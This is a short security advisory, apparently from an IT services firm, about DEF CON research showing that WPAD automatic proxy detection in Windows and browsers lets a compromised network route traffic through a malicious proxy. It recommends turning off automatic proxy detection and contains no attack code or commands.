Breach by Proxy: Disable WPAD Immediately

Breach by Proxy: Disable WPAD Immediately

This just in from the DEF CON security conference in Las Vegas on August 7: security researchers Paul Stone and Alex Chapman revealed that a default setting in Windows and one that is present in many web browsers across operating systems allows a compromised network to re-route your browser traffic via a malicious proxy, allowing an attacker to steal information in transit between your browser and the website you’re visiting, whether or not your browser connection is secured.

 Disabling automatic detection of proxy settings in your operating system and browser is for the moment the only way to ensure that a compromised network can’t cause you significant harm.  Most users don’t rely on a web proxy for access to the internet or their corporate network anyway, so leaving automatic detection of web proxy settings enabled is far riskier than turning it off. ECHO is recommending you turn off this setting now or reach out to your IT department for guidance.

 The culprit appears to be the WPAD protocol, which uses DNS lookups, DHCP options and link-layer multicast name resolution to detect whether it should be using a proxy, and then downloads a configuration script that permits some or all URLs accessed by the browser to go through the proxy – with or without encryption first.  It’s possible to disable this protocol on managed workstations and ECHO is recommending this be done unless a proxy is actually needed, in which case it should be enforced in another way.

As always, ECHO is here to help if you have questions.